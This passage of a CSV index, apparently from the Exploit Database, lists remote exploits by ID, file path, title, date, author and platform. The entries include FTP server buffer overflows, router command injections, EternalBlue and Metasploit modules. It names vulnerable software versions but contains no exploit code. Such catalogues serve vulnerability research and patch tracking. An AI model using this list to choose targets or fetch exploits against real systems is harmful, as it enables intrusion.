Disclosure",2016-10-26,"Jason Doyle",hardware,remote, -40643,exploits/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote, -40651,exploits/windows/remote/40651.py,"Rumba FTP Client 4.x - Remote Stack Buffer Overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote, -40670,exploits/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Remote Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote, -40674,exploits/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Remote Buffer Overflow",2016-11-01,Ger,windows,remote, -40672,exploits/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Remote Buffer Overflow",2016-11-01,Karri93,windows,remote, -40673,exploits/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Remote Buffer Overflow",2016-11-01,Cybernetic,windows,remote, -40675,exploits/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,windows,remote, -40677,exploits/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Remote Buffer Overflow",2016-11-01,Eagleblack,windows,remote, -40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,windows,remote, -40681,exploits/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Remote Buffer Overflow",2016-11-02,ScrR1pTK1dd13,windows,remote, -40689,exploits/linux/remote/40689.rb,"Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)",2016-11-02,Metasploit,linux,remote, -40693,exploits/windows/remote/40693.py,"WinaXe 7.7 'FTP client' - Remote Buffer Overflow",2016-11-03,hyp3rlinx,windows,remote, -40694,exploits/windows/remote/40694.txt,"Rapid PHP Editor 14.1 - Remote Command Execution",2016-11-03,hyp3rlinx,windows,remote, -40704,exploits/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Remote Buffer Overflow",2016-11-03,Cybernetic,windows,remote, -40711,exploits/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Remote Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote, -40712,exploits/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Remote Buffer Overflow",2016-11-04,Karri93,windows,remote, -40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote, -40714,exploits/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Remote Buffer Overflow",2016-11-04,"Pablo González",windows,remote, -40715,exploits/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote, -40720,exploits/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote, -40721,exploits/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote, -40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,windows,remote, -40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote, -40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote, -40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote, -40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote, -40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote, -40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547 -40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote, -40778,exploits/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote, -40805,exploits/multiple/remote/40805.rb,"D-Link DIR-Series Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80 -40813,exploits/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote, -40824,exploits/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80 -40830,exploits/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40831,exploits/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40833,exploits/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40832,exploits/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40834,exploits/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40835,exploits/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Remote Buffer Overflow",2016-11-28,Tulpa,windows,remote, -40854,exploits/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Remote Buffer Overflow",2016-12-01,vportal,windows,remote, -40857,exploits/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote, -40858,exploits/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote, -40862,exploits/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote, -40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote, -40868,exploits/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote, -40869,exploits/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Remote Buffer Overflow",2016-12-05,vportal,windows,remote, -40881,exploits/windows/remote/40881.html,"Microsoft Internet Explorer 9 - 'jscript9' Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote, -40911,exploits/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote, -40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote, -40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote, -40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote, -40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80 -40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22 -40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote, -40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote, -41003,exploits/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Remote Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote, -41013,exploits/linux/remote/41013.txt,"Ansible 2.1.4/2.2.1 - Command Execution",2017-01-09,Computest,linux,remote, -41041,exploits/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)",2017-01-13,Metasploit,linux,remote, -41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",windows,remote, -41079,exploits/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80 -41146,exploits/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80 -41148,exploits/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Remote Command Execution",2017-01-24,"Google Security Research",windows,remote, -41151,exploits/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote, -41153,exploits/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote, -41162,exploits/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote, -41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote, -41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote, -41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote, -41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote, -41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80 -41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote, -41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote, -41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote, -41471,exploits/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote, -41479,exploits/windows/remote/41479.py,"SysGauge 1.5.18 - Remote Buffer Overflow",2017-02-28,"Peter Baris",windows,remote, -41480,exploits/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote, -41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",windows,remote, -41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",windows,remote, -41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote, -41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80 -41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800 -41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080 -41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote, -41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",windows,remote, -41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,windows,remote, -41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,linux,remote,22 -41680,exploits/linux/remote/41680.rb,"ExaGrid - Known SSH Key and Default Password (Metasploit)",2016-04-07,Metasploit,linux,remote,22 -41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,multiple,remote, -41689,exploits/multiple/remote/41689.rb,"Ruby on Rails 4.0.x/4.1.x/4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,multiple,remote, -41690,exploits/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote, -41694,exploits/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote, -41695,exploits/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote, -41795,exploits/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote, -42261,exploits/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 -42885,exploits/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",multiple,remote, -42256,exploits/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 -42756,exploits/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote, -42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251 -42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote, -42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001 -41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote, -42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote, -41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote, -41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 -41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote, -41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",windows,remote, -41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote, -41744,exploits/linux/remote/41744.rb,"Github Enterprise - Default Session Secret and Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 -41751,exploits/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote, -41775,exploits/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Remote Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote, -41808,exploits/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote, -41825,exploits/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote, -41850,exploits/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote, -41852,exploits/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote, -41861,exploits/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote, -41872,exploits/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23 -42122,exploits/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23 -41892,exploits/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000 -41894,exploits/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote, -41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote, -41903,exploits/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote, -41910,exploits/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote, -41929,exploits/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote, -41934,exploits/windows/remote/41934.rb,"Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)",2017-04-25,Metasploit,windows,remote, -41935,exploits/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80 -41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22 -41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",macos,remote, -41975,exploits/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",windows,remote, -41978,exploits/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote, -41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80 -41992,exploits/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote, -41996,exploits/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote, -42010,exploits/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote, -42011,exploits/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote, -42030,exploits/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 -42022,exploits/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote, -42023,exploits/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423 -42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote, -42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80 -42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote, -42031,exploits/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 -42083,exploits/windows/remote/42083.rb,"Octopus Deploy - Authenticated Code Execution (Metasploit)",2017-05-29,Metasploit,windows,remote, -42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,linux,remote, -42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote, -42057,exploits/windows/remote/42057.rb,"VX Search Enterprise 9.5.12 - GET Buffer Overflow (Metasploit)",2017-05-23,Metasploit,windows,remote, -42060,exploits/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote, -42078,exploits/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,linux,remote, -42079,exploits/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote, -42125,exploits/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote, -42128,exploits/windows/remote/42128.txt,"Home Web Server 1.9.1 (build 164) - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote, -42134,exploits/python/remote/42134.rb,"DC/OS Marathon UI - Docker (Metasploit)",2017-06-07,Metasploit,python,remote, -42152,exploits/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote, -42155,exploits/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Remote Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote, -42158,exploits/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote, -42159,exploits/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote, -42165,exploits/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote, -42175,exploits/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote, -42176,exploits/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100 -42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote, -42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,windows,remote, -42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443 -42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 -42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000 -42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote, -42288,exploits/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote, -42289,exploits/android/remote/42289.txt,"Australian Education App - Remote Code Execution",2017-06-30,intern0t,android,remote, -42296,exploits/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 -42297,exploits/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 -42303,exploits/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote, -42304,exploits/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Remote Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote, -42315,exploits/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote, -42327,exploits/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote, -42328,exploits/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Remote Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote, -42331,exploits/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote, -42394,exploits/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote, -42349,exploits/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote, -42350,exploits/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote, -42354,exploits/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote, -42355,exploits/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,hardware,remote, -42369,exploits/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote, -42370,exploits/unix/remote/42370.rb,"VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote, -42395,exploits/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Remote Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote, -42484,exploits/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote, -42541,exploits/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,php,remote, -42557,exploits/windows/remote/42557.py,"Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote, -42558,exploits/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote, -42559,exploits/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote, -42560,exploits/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Remote Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote, -42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote, -42614,exploits/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote, -42627,exploits/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote, -42630,exploits/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Remote Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80 -42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375 -42683,exploits/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote, -42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow 